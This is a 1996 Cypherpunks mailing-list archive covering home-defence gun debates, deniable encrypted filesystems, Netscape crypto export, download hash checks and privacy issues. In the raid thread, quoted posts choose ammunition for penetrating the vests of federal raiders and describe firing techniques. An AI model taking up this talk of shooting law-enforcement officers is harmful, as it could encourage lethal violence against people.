Message-ID: <Pine.SUN.3.91.960718201611.24193A-100000@crl2.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Thu, 18 Jul 1996 ichudov@algebra.com (Igor) wrote:

> Re: peaceful people in your house. Did you ever have bad dreams?  Did
> you ever have guests in your house?

I have had guns, bad dreams and guests in my house all at the 
same time, many times.  So far, I've managed to avoid shooting
anyone.

> Imagine that you have a guest who at 4am woke up and went to
> the bathroom. Then you see a bad dream how you are being
> robbed, see the guy in the dark, forget that he is your guest,
> and shoot him. Not very pretty, huh?

Not pretty but fortunately very unlikely.  I can imagine 
everything you said except forgetting someone is in my house.  
When I have someone under the mantle of my protection, my senses 
and my awareness are *hightened* not reduced. 
 
Okay, so this is my excuse to tell my L.Neil Smith gun story.
On my way driving to the East Coast, I stopped over for a night
with Smith.  If you are familiar with his writing you might
imagine that his house is no stranger to firearms.  That night
I got up to (guess what) go to the bathroom.  On my way back
to the couch where I was sleeping, I was attacked by...
Neil's cat.  It reached out from under a table and scratched my
foot.  I was afraid he would go for my face or something once I
was asleep again, so I went to Neil's room to ask him to put the
cat someplace.  Neil, wearing nothing but his shorts and a BIG
.44 automag came out to see what I wanted.  I told him and he
put the cat in the basement.  I thanked him and said the gun
wasn't necessary as I didn't want him to shoot the cat.  His
response was, "I wasn't planning on shooting the cat."  Gulp!
And yet I live.  I'll trust a gunnie over a jackbooted ninja
any time and any place.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: EVERHART@Arisia.GCE.Com
Date: Fri, 19 Jul 1996 13:17:46 +0800
To: cypherpunks@toad.com
Subject: re: Opiated file systems
Message-ID: <960718203303.62@Arisia.GCE.Com>
MIME-Version: 1.0
Content-Type: text/plain


Hmm...
I can set up a cryptodisk on a not necessarily contiguous file on
another cryptodisk; the software is free. The second cryptodisk
would appear to be just a binary file on the first; would it not
be an obscured filesystem? (The drivers have been given away for years
public domain for vms, vax or alpha, in source. My old rsx11d driver
was published similarly back in 1977 or 78.) In fact, though, the
containing file of a cryptodisk does not have to have any specific
name or location, and can be hidden away as though it were, say,
a sound file or something else among the rest of the system store.

Before someone comes demanding your keys, they first have to realize
that something might in fact be encrypted. My approach would be to have
lots of these obscured cryptodisks for the stuff I wanted private,
if I wanted to hide a lot, and have the usual assortment of cleartext
stuff of all sorts lying around. The default operation mode forgets
the keys automatically once you log off...or even at dismount. 

If you're stuck with a whole partition being hidden, this is harder to
do. When any file of over a few kb can be a separate filestructure
when the proper magic is applied, locating the keys can be impossible.

glenn




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vinnie Moscaritolo <vinnie@webstuff.apple.com>
Date: Fri, 19 Jul 1996 14:55:33 +0800
To: cypherpunks@toad.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
Message-ID: <v03007601ae14b98f81fd@[17.203.21.77]>
MIME-Version: 1.0
Content-Type: text/plain


Tim, I understand you are pissed about what's going on in society but this
really isnt a great strategy;

>Personally, I think all folks should be armed at all times in their homes.
>Those who aren't are taking their chances.

doesn't this make you a prisoner of sorts... it is not healthy to go
through long periods of time in orange alert.  this might sound macho but
it's impracticle.

> My personal choice is a Heckler
>& Koch USP .45. loaded with Federal Golden Sabres, a hollowpoint round that
>has a 92% one-shot stop rate, with adequate penetration through Kevlar
>vests (typically worn by BATF raiders).
>Fortunately, though KTW ammo is no longer available to "marks" (=
>civilians), .45 ACP +P does a pretty good job. Certain +P .357 Magnum
>rounds are even better penetrators, but recoil and muzzle blast is pretty
>severe with these loads.)

Your choice of weapon is admirable, but I would suggest that something more
akin  to Glaser safety slugs,  SW.40 or .45 would be better. with proper
training you can perform an upward stitch, legs first. the point is the
Glaser won't pentrate the walls and nail your neighbors. The +P penetration
is way to strong and most likely to pass through.

A scatergun is generaly a better weapon for home defense. there is
something about looking down a 12 guage that changes your mind, Ninja suit
or not. Besides this kind of strategy is better used on gangsta types.

>I may die, but I hope I can take at least two of them with me.

pretty dumb attitude, I would also profess that One Live Tim May, even in
Jail  is worth more to the protection of freedom than one martyred nekid
hippy.
getting into a gunfight with an entry team that has had much more practice
than you can only lead to one conclusion, really the only protection from
these Ninja's is through some form of covenant community. All joking aside
that what Bo Gritz was really trying to do in Idaho, build a place where
your neighbor watches each others back. It doesnt mater whether your agree
with his politics or not, the point is he has an workable idea, Now couple
that with redundant instant communication..the kind that is hard to jam.
hmm imagine what  Waco would have been like if the Branch Davidians:

1) were not morons.
2) knew how to use the news media
3) had redundant, spread spectrum, satilite, and underground comms into the
net.

This equals instant net coverage, to rival CNN. It makes for a hard
target.Armed with your Militia-Mailer(tm) the strong crypto edition and
live video, these folks would never consider getting near you.

In some ways we already have one now, there are quite a few Cypher-punks
out there, and it's pretty easy to get the word out.

Historicaly  folks like BATF  prefer softer targets, they are safer. Ever
wonder why doesnt the Reno squad hit the crack houses..well thats kind of
dangerous, these folks know what they are doing and the cost to raid them
can be very expensive in lives. And what do you get when your done, another
well payed judge simply lets em out again..

It's also clear that there is another manufactured arms race going on, this
time instead of Communism it's the "war on some drugs"  It is costing us an
incredable amount of tax dollars, it fucks with our freedoms, and produces
limited results. This war also has the side-effect of producing a general
feeling of disenfrancisement among the very citizens it is designed to
protect.
Folks like Her Klinton, piss off the the American people, when on one hand
they spout rhetoric about how drugs are bad, and on the other hand condone
them.

Fighting back through firepower is unlikely to acheive the goal you want,
It endangers innocent (if there are any left) folks and leaves you looking
like a HCI poster child. I can see it now, "Crazed Naked Hippy Dies in
battle with Federal Officers, linked to ITAR regulated Munitions factory".

A better approach is to disarm and expose these bozos for what they are,
and for christ sakes get out there and VOTE... dammit... and get your
friends to VOTE..

But what do I know.. I just play a lawyer in Bob's rants..



Vinnie Moscaritolo
"Law - Samoan Style"
http://www.vmeng.com/vinnie/
Fingerprint: 4FA3298150E404F2782501876EA2146A






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Fri, 19 Jul 1996 03:08:16 +0800
To: cypherpunks@toad.com
Subject: Re:
Message-ID: <1.5.4.32.19960718150227.002de9ac@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 18:10 17/07/96 -0700, someone via anonymous-remailer@shell.portal.com wrote:
>Does anyone know how to tanslate PGP into Burmese?

I've been talking to human rights people here -- we certainly
plan to translate into one or more Indian languages, and perhaps
soon there will be action at an Asian level as well. Is this an
urgent requirement? If so, I can try to arrange. 

Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 19 Jul 1996 13:18:20 +0800
To: david@sternlight.com (David Sternlight)
Subject: Re: (fwd) Re: US versions of Netscape now available---NOT
In-Reply-To: <v03007603ae14223a6068@[192.187.162.15]>
Message-ID: <199607190206.VAA11239@homeport.org>
MIME-Version: 1.0
Content-Type: text


David Sternlight wrote:

| >   Whatever YaKnow
| >   cybernut@nutcom.com
| >   10401 Wilshire Blvd, Suite 805
| >   Los Angeles, CA 90024-4628
| >   (310) 475-3799

| >Your friend.
| 
| Isn't that nice. Some creep is proud enough of his skill at accessing the
| trivially available InterNIC finger data that he posts it to invoke
| harassment. And being a coward as well, he hides behind an anonymous
| remailer.

	I see nothing cowardly about opposing a bad law from where the
Feds can't harrass you.  If the Feds were 'moral and upright' about
enforcing the ITARs, instead of keeping Phil under indictment until
the last minute, harrassing MIT via Sandia National Labs, and refusing
to make clear the laws under which we live, then you might call it
cowardly to oppose the law from behind a shield of anonymity.
However, the Feds don't play by any set of rules known to the public.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Fri, 19 Jul 1996 14:35:55 +0800
To: David Sternlight <david@sternlight.com>
Subject: Re: New Infowarfare Panel
In-Reply-To: <v03007607ae142d52fbb1@[192.187.162.15]>
Message-ID: <31EEEFFD.386B@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


David Sternlight wrote:

> >My personal recollection... high speed fighter-bomber aircraft ...

> I'm talking about some of the information that started slowly leaking out
> later, not the prime-time TV pyrotechnics.

Well, a lot of stuff "leaked out", but I'm not sure how much was actually
acknowledged to be true.  There was the thing about the "virus" in the
printer drivers, or something like that, but I seriously don't see how
any sort of software "attack" would have much significance once the 
Iraqi national microwave network was blasted into oblivion.

The point is that I don't personally believe that there's much of a
credible threat of one of these "Infowar Attacks" that this new 
commission plans to anticipate (by some means of divination; I am
really eager to see what that turns out to be).  Commercial systems
are disparate enough and so inherently flaky that I doubt some terrorist 
agency could do much worse than your run-of-the-mill catastrophic 
system failure.  The power grid is an exception, perhaps, but to 
attack that with any sort of real effect would probably require a
physical attack, and in any case even the grid seems capable of
random failures that bring about random chaos without the need for
creepy foreigners.

I also dispute the "lighthouse" story.  That setup only is meaningful 
when there's a service necessary to the well-being of the community in a 
situation where no mechanism for ready cash flow to a provider exists.  
I question the premise that commercial suppliers of security systems &
consulting can't solve corporate security problems effectively.  Indeed, 
a good argument could be made that we're better defended by a wide 
variety of different security systems, rather than a single General 
Issue Uncle Sam Security System.

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * For the time being,
       m5@tivoli.com * m101@io.com          *    
      <URL:http://www.io.com/~m101>         *    three heads and eight arms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Fri, 19 Jul 1996 15:10:27 +0800
To: cypherpunks@toad.com
Subject: MSNBC and cookies
Message-ID: <199607190426.VAA10722@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


In attempting to check out different Net media coverage of TWA 800, it
appears the msnbc.com site won't let you in without a cookie.  Repeated
cookie cancels with Navigator 3.0 drop you into an indigestive loop of the
server continuing to try to force feed you cookies.  When you finally click
OK, you get in.

Am I spacing, or is this the first site anyone's stumbled on that requires a
cookie for access?  I've never been shut out of a site for canceling a
cookie.  The first cookie request does have a user ID field.  If the server
(or client) isn't misbehaving, this seems like a wee bit of a privacy issue.

I tried accessing the page (http://www.msnbc.com) on 7/18/96 around 9:15 PM
PDT.  Anyone care to confirm this.

Joel





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Fri, 19 Jul 1996 14:31:38 +0800
To: sandfort@crl.com (Sandy Sandfort)
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <Pine.SUN.3.91.960718172621.11135B-100000@crl12.crl.com>
Message-ID: <199607190227.VAA24586@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Sandy Sandfort wrote:
> 
> > If you had a metal door, you would have enough time to wake up
> > and assess the situation.
> 
> This is good advice though.  Ironically, the only person I know
> with such a door is an ex-cop.  Who should know better?

That was the essense of my letter. The problem of Tim's approach is that 
he has no time to react to a situation. The intruders will kill him 
faster than he will be able to shoot.

Also, do not forget that if you sleep at night, your eyes will not be
used to bright light. Thus, an intruder with a bright flashlight would
be able to make you almost blind (and yes, you can keep the flashlight
away from your body).

I of course have no idea about Tim's accommodations, but in my apartment
it takes about one second to break into my door if you have a heavy axe.
Then three seconds after you break into the door you are in my bedroom and
can shoot at me. Would a gun under my pillow help? I don't think so.

Now if I had a good door, I would have tim to wake up, cock the gun, 
maybe call for help, and so on. Quite a different situation.

Re: peaceful people in your house. Did you ever have bad dreams?  Did
you ever have guests in your house? Imagine that you have a guest who at
4am woke up and went to the bathroom. Then you see a bad dream how you
are being robbed, see the guy in the dark, forget that he is your guest,
and shoot him. Not very pretty, huh?

Again, if your house was well protected, you would not be so alert
and would allow yourself some time to wake up and think.

If you do not believe me, refer to the rec.guns FAQ. It has all
been discussed there.

And really, I do not get why anyone wants to argue over this point: if
you are concerned about ninjas, extraterrestials, robbers or whoever
breaking into your house, PROTECT YOUR F^&*($G HOUSE. Then you can get
a gun, blaster, grenade launcher or whatever, but none of the above will
save you if you have only 4 seconds warning.

I am not asking Tim to get rid of his gun -- I am merely suggesting
how to _improve_ security.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Fri, 19 Jul 1996 13:38:04 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Netscrape download
Message-ID: <199607190151.VAA14421@nrk.com>
MIME-Version: 1.0
Content-Type: text





[From Phil Karn]


Netscape's use of a CGI interface to download the US version
(128-bit key) of Netscape Navigator raises the possibility
that they are "serializing" or "personalizing" each copy they
send out, perhaps in response to a DoS request that they do so
in order to trace unauthorized redistribution.

One way to test this theory without redistributing the actual
code is to compare MD5 hashes of the distributions. After two
days of unsuccessful attempts at obtaining the code from their
overloaded server, I've just successfully downloaded the SunOS,
BSDI and Windows 95 versions of Netscape Navigator. Here are the
MD5 hashes of the files I received:

BSDI version:
4ec4a705e2e4c6560475852fae807c8c

SunOS version:
e72ff352ca7c619cb31b8f8ef3651b28

Windows 95 version:
8e936813f12a1b3b77ed03d9239ebd5d

Anybody care to compare these to the copies they obtain, assuming
the logjam on the server breaks sometime soon?

Phil

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close...........(v)301 56 LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead........vr vr vr vr.................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven L Baur <steve@miranova.com>
Date: Fri, 19 Jul 1996 15:12:56 +0800
To: wb8foz@nrk.com
Subject: Re: Netscrape download
In-Reply-To: <199607190151.VAA14421@nrk.com>
Message-ID: <m291cgu9oh.fsf@deanna.miranova.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "David" == David Lesher <wb8foz@nrk.com> writes:

I already trashed the Linux .tgz I downloaded, all I've got left to
compare are the Microsoft Windows '95 (spit, to borrow a term), and
Microsoft Windows 3.1 (spit, to borrow a term).

David> Windows 95 version:
David> 8e936813f12a1b3b77ed03d9239ebd5d
       8e936813f12a1b3b77ed03d9239ebd5d  ns_inst-95.exe



# md5sum ns_inst-31.exe
0f4de3e744ec4e356ba9f8feb3ded7ec  ns_inst-31.exe

Linux executable:
$ md5sum =netscape-3.0b5
a82666e8c83a39c4e4653f0de2a930cf  /usr/local/www/bin/netscape-3.0b5

I seriously doubt they're playing any games.

Also, I got onto their system within a half hour of spotting the
announcement sitting in my cypherpunks.spool file and had no trouble
downloading even though it wouldn't let me into the site with Lynx.
I'd say they gave this list preferential, timely treatment ...
-- 
steve@miranova.com baur
Unsolicited commercial e-mail will be proofread for $250/hour.
Andrea Seastrand: For your vote on the Telecom bill, I will vote for anyone
except you in November.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@zifi.genetics.utah.edu (Anonymous)
Date: Fri, 19 Jul 1996 14:47:17 +0800
To: cypherpunks@toad.com
Subject: Re: New Infowarfare Panel
Message-ID: <199607190403.WAA26099@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


David Sternlight wrote:

<snip>

>I'm talking about some of the information that started slowly leaking out
>later, not the prime-time TV pyrotechnics.

It doesn't "slowly leak out" as if there were some regrettable lapse in
the plumbing. Someone has to commit the federal crime of military espionage!
<snicker>







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "rednax" <rednax@asiapac.net>
Date: Fri, 19 Jul 1996 01:57:38 +0800
To: <cypherpunks@toad.com>
Subject: Re:Seek And Destroy
Message-ID: <199607181403.WAA12919@gandalf.asiapac.net>
MIME-Version: 1.0
Content-Type: text/plain


Hmm, this page however, does something if you are using netscape

www.angelfire.com/pages0/cbp3/index.html

-- 
 r 3 |) |\| @ ><
rednax@asiapac.net
"violent! you mean it's alive??"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Fri, 19 Jul 1996 10:10:53 +0800
To: david@sternlight.com
Subject: Re: US versions of Netscape now available
In-Reply-To: <v03007600ae13ace3cf64@[192.187.162.15]>
Message-ID: <199607182111.WAA00315@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



David Sternlight <david@sternlight.com> writes:
> >> It doesn't "leak overseas" as if there were some regrettable lapse in the
> >> plumbing. Someone has to commit a felony violation of Federal law.
> >
> >     No they don't. If they are French, Russian, English, Greek, etc. They
> > _may_ be violating their countries laws, but they are not necessarily
> >violating ours.
> 
> That is only true if they find a way to crack Netscape's software
> distribution security from overseas, or somehow found a user machine with
> the software on it and cracked IT. IF the thing leaks it is much more
> likely because someone on our side of the border was complicit.

I'm not sure that is necesarily true.  The checks are normally very
flimsy, and near trivial for anyone to break.  I don't think anyone
knows _who_ exports new versions of PGP etc, so I'm not saying you're
wrong either, only saying: we have no way of knowing.

> Do I _think_ it will stay on this side of the border? Of course not. But
> any leaked copies will be illicit and won't be in the "mass" market of
> non-US Netscape versions. 

Well, I understand some of the previous (commercial) 128 bit versions
of Netscape leaked, and I presume they were not available from all the
usual ftp sites because they were commercial.

Presumably as this latest netscape beta is freely distributable, once
it's out it will be on ftp.unimi.dsi.it, ftp.ox.ac.uk, etc, etc.

(the US version of PGP is on various non-US ftp sites, I don't see any
reason why freely distributable netscape binaries should be
different).

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 19 Jul 1996 16:12:30 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199607190516.WAA19014@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello!

Sorry for the off  topic. 

I want to ask how to install Netscape3.0b5a under NT. 

I keep getting   "Netscape is unable to locate the server: home.netscape.com.  The server does not have a DNS entry."



Thanks





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kdf@gigo.com (John Erland)
Date: Fri, 19 Jul 1996 16:34:04 +0800
To: cypherpunks@toad.com
Subject: Periodic Mix-to-DOS Port Inquiry
Message-ID: <e9b_9607182234@gigo.com>
MIME-Version: 1.0
Content-Type: text/plain



(Please reply via netmail - I haven't regular list access.)

Is Mixmaster ported to DOS yet?

Thanks...
--
: Fidonet:  John Erland 1:203/8055.12  .. speaking for only myself.
: Internet: kdf@gigo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Fri, 19 Jul 1996 10:44:06 +0800
To: WlkngOwl@unix.asb.com
Subject: Re: Opiated file systems
In-Reply-To: <199607172125.RAA09158@unix.asb.com>
Message-ID: <199607182148.WAA00324@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Rob <WlkngOwl@unix.asb.com> writes:
> On 16 Jul 96 at 19:21, Mark M. wrote:
> > > A problem with a c'punk-style encrypted fs with source code and wide 
> > > distribution is, of course, that attackers will KNOW that there is a 
> > > duress key.
> > 
> > I don't see how this would effect the security of such a filesystem.
> > There is absolutely nothing that an attacker can do to get the real
> > key.  An attacker would just ignore all computers that have duress
> > key capability.
> 
> [attack on duress system]
>
> 3. reverse-engineer file system driver to figure out how the
> duress-key works,

I thought the presumption was that source code was provided (for the
duress feature too)?

The whole system should be designed to withstand scrutiny as to
whether or not there is a duress file system on any given disk, on the
assumption that the opponent as full access to the source.

ie. the attacker can not tell without the hidden file system key (if
one exists) whether the unused space on your drive is really just
that: unused space filled with garbage, or whether it is in fact
another encrytped filesystem.

They might be suspicious, but I don't think they would be able to
claim you were in comptempt of court, if you provide the 1st key and
claim there is no other key: the software has support for either 1 or
2 filesystems.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@issl.atl.hp.com>
Date: Fri, 19 Jul 1996 15:07:37 +0800
To: david@sternlight.com (David Sternlight)
Subject: Re: Gorelick testifies before Senate, unveils new executive order
In-Reply-To: <v03007603ae14644ce4b1@[192.187.162.15]>
Message-ID: <199607190304.XAA17972@jafar.issl.atl.hp.com>
MIME-Version: 1.0
Content-Type: text/plain


David Sternlight writes:
> 
> At 1:32 PM -0700 7/18/96, Jeff Barber wrote:

> >> Let's see what the study group recommends. There are a lot of things the
> >> government can do, and plenty of historical precedent.
> >
> >There *are* a lot of things government can do.  There aren't a lot of
> >things it can do well.  But you want to wait and see what a *government
> >study group* decides to recommend?  Gee, who can guess what they'll decide?
> 
> You should do your homework. It's going to have a lot of industry people on
> it and be chaired by an industry person.

This isn't the same panel I saw mentioned on this list.  That one had,
as I recall, two individuals being selected by each of several cabinet 
departments and executive agencies.


> Now THAT is apples and oranges. The security of, say, IBM's, or the FAA's,
> or AT&T's domestic computer networks has little to do with crypto export
> policy.

Big companies like IBM, AT&T, etc. have *international* networks.  Hence,
the connection to the crypto export policy, which prevents comprehensive
security programs from being deployed.  As a "senior techinical executive"
(oxymoron alert) to Fortune 50 companies, I assume you know that and are
simply choosing to ignore it for the sake of your current argument.


> >Putting the government in charge of fixing security problems is likely
> >to result in an infrastructure optimized for surveillance, as we've seen
> >with other government-sponsored initiatives (Clipper, DigitalTelephony,
> >etc.).
> 
> The subject matter of the Commission's inquiry has more to do with
> authentication than message encryption, and more to do with infrastructure
> and network security. And as it happens there is no problem getting export
> licenses for authentication-only software with as secure a key as you like
> and no escrow. RIPEM/SIG did it years ago. You aren't even on the same page
> as this issue.

There is more to security than authentication, as I'm sure you also know
but are choosing to ignore.  Authentication alone may suffice in some
situations but clearly not all.  And in fact, this merely supports my
point: left to government's preference, we'll all be well-authenticated
when the surveillance tapes are introduced into evidence. (:-)


> Again, you are trying to fight a different battle in the wrong arena.
> This isn't about your ability to encrypt your traffic. It's about securing
> the domestic infrastructure against information warfare. I know this is
> beginning to sound tiresome, but you'd better do your homework.

Indeed.  This isn't a different battle, though; it's all interwoven.
I don't want the government responsible for "securing the domestic
infrastructure..." for the same reason that I don't want them telling
me where or to whom I can sell crypto.  They haven't any right to, IMO,
and besides, I don't trust them to look out for my interests.


-- Jeff




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jean-Paul Kroepfli <JeanPaul.Kroepfli@ns.fnet.fr>
Date: Fri, 19 Jul 1996 09:13:16 +0800
To: "'Ian Goldberg'" <iang@cs.berkeley.edu>
Subject: RE: overseas PGPfone and Netscape
Message-ID: <01BB7500.DB668740@JPKroepfli.S-IP.EUnet.fr>
MIME-Version: 1.0
Content-Type: text/plain


Ian Goldberg wrote:
>Could various people with various architectures post MD5 or SHA1 hashes
>of the files they downloaded?

(i) very good idea
(ii) Do you know where I can find a MSWin or MSDOS executable of SHA?

Jean-Paul
~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-
Jean-Paul et Micheline Kroepfli      (our son: Nicolas and daughter: Celine)
eMail: JeanPaul.Kroepfli@utopia.fnet.fr    Also Compuserve and MSNetwork
Phone: +33  81 55 52 59  (F)          PostMail: F-25640 Breconchaux (France)
   or: +41  21 843 27 36 (CH)               or: CP 138, CH-1337 Vallorbe
  Fax: +33  81 55 52 62                                        (Switzerland)
Zephyr(r) : InterNet Communication and Commerce, Security and Cryptography consulting
PGP Fingerprint : 19 FB 67 EA 20 70 53 89  AF B2 5C 7F 02 1F CA 8F
"The InterNet is the most open standard since air for breathing"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 19 Jul 1996 17:28:50 +0800
To: cypherpunks@toad.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
Message-ID: <ae146d300502100482e4@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:27 AM 7/19/96, Igor Chudov @ home wrote:
>Sandy Sandfort wrote:
>>
>> > If you had a metal door, you would have enough time to wake up
>> > and assess the situation.
>>
>> This is good advice though.  Ironically, the only person I know
>> with such a door is an ex-cop.  Who should know better?
>
>That was the essense of my letter. The problem of Tim's approach is that
>he has no time to react to a situation. The intruders will kill him
>faster than he will be able to shoot.

Look, I took this discussion to private e-mail with Igor earlier today,
figuring the rest of you had already gotten my basic point in my main
article and did not need further explanations. However, as Igor is imputing
motives and plans to me, I have to comment.

First, as I explained to Igor in e-mail, my home has _multiple_ (7 or 8)
windows on the ground floor, several (3) sliding glass doors, and a couple
of outside doors. The expense of fortifying each to Igor-recommended,
Ninja-resistant levels would be quite high. (And I have seen houses with
bars on all the windows...not a pretty sight, and not something I moved to
my hill to turn around and imprison myself with. Not only are such bars
ugly, they are expensive. And a potential fire hazard, as several cases
have shown; people have been trapped in burning homes, unable to unlock the
bars.)

Second, and in line with Sandy's comments, I am quite aware--and quite
careful--when visitors or guests are staying in my home. The scenario of my
not realizing a noisemaker is one of my guests is implausible. In any case,
most of the time I have no guests. Those who train with guns understand the
dangers, the risks, and the proper handling of situations.

Third, there are no plausible scenarios for "someone peaceful who
entered your home with good intentions." If someone is in my home,
uninvited and without my knowledge, the law in California and in most other
states says that I am justified in firing. Period. I don't have to read him
his rights, I don't have to ask if his intentions are peaceful, I don't
have to have proof that he plans to shoot me. All I have to have is
reasonable fear that I or my family/guests could be in danger. (The exact
legal wording is something like this, but may be slightly different.) I
know of few if any cases where a prowler was shot in a darkened house--or
even during daylight--and any successful prosecution or lawsuit resulted.

Fourth, the huge increase in "home invasions" in recent years should cause
anyone to stop and ponder self-protection. ("Home invasion" is the practice
of a gang of robbers hitting a house hard and fast, tying up or shooting
the occupants, and then ransacking the place for anything they can carry.
Often the occupants are shot execution-style.) Cops are not likely to be of
much help.

Fifth, when intruders, robbers, wandering drunks, and home invaders think
there is no chance of a homeowner defending himself, crime rates tend to be
high. In communities of the West where large percentages of homeowners have
shotguns and assorted handguns, the crime rate appears to be much lower
than in "disarmed" places back East. (We could argue the statistics on this
til the cows come home, and I don't plan to. Talk.politics.guns is the
place.)

>Also, do not forget that if you sleep at night, your eyes will not be
>used to bright light. Thus, an intruder with a bright flashlight would
>be able to make you almost blind (and yes, you can keep the flashlight
>away from your body).

Your point being? I have no idea if intruders are planning to use
flashlights to blind victims, but I rather doubt it. The nature of the most
common intruder-defender situation is that the intruder typically does not
want to awaken the defender...indeed, he tries to strike when he thinks the
defender is away. (And most cases of intruders killing the defenders is
when the defenders surprise the intruders.) Obviously there are all kinds
of scenarios, but I'm skeptical that flashlights are a useful strategem for
either side to count on. (I am thinking about getting a ultra-bright
flashlight, though.)

>I of course have no idea about Tim's accommodations, but in my apartment
>it takes about one second to break into my door if you have a heavy axe.
>Then three seconds after you break into the door you are in my bedroom and
>can shoot at me. Would a gun under my pillow help? I don't think so.

The good news for we defenders, and this applies to both the gun case and
the hypothesized "flashlight" case is that most intruders are poorly
trained in gun-handling, are armed with fairly wimpy guns (e.g., .38s),
have practiced very little, and rarely carry high-power flashlights (such
as the extremely bright "Sure-Fire" tactical flashlights). Cops are, of
course, another story.

The point being that a citizen who practices at the range, firing at least
500 rounds a year or so at combat-range targets, is usually _much_
better-prepared to win a firefight with a street punk carrying a .38  or
.25 he's never fired before. (Ninjas are another story, of course.)

(However, to a person who is unarmed, a shot from a .38 or a .25, or even a
.22, can result in death.)


>Now if I had a good door, I would have tim to wake up, cock the gun,
>maybe call for help, and so on. Quite a different situation.

Yeah, fine, you've now made your "good door" point several times, here and
in private mail to me. So get a "good door" already! (BTW, my door is a
solid-core heavy door, with Schlage lock and deadbolt, so it ain't wimpy.
Ninjas have special tools to zap even such doors, but, frankly, I'd expect
them to come in through the windows. As I said, I don't plan to spend
thousands of dollars installing Lexan windows and bars, for various
reasons. And windows are almost always the point of entry for burglars, not
crashing through the front door.)


>If you do not believe me, refer to the rec.guns FAQ. It has all
>been discussed there.

Puh-leese! As Perry would say, don't teach Grandpa how to suck eggs. I've
been shooting since 1974 (not counting childhood target practice) and am
pretty well-versed in such things.

>I am not asking Tim to get rid of his gun -- I am merely suggesting
>how to _improve_ security.

Yeah, but you have a one-track mind ("get a good door"). And bringing in
all the nonsense about bad dreams and sleepwalkers and lawsuits by people
strolling through living rooms for "peaceful purposes" (though not invited
by the owner!) and the like...this set of nonsense can only be interpreted
in the context of your thinking that having guns in a house is dangerous.

Do as you wish, Igor. Please, by all means, replace your apartment door
with a heavier one, even a steel-core one. But don't conflate this advice
with nonsense about dreams, sleepwalkers, getting arrested for defending a
home, and suchlike.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
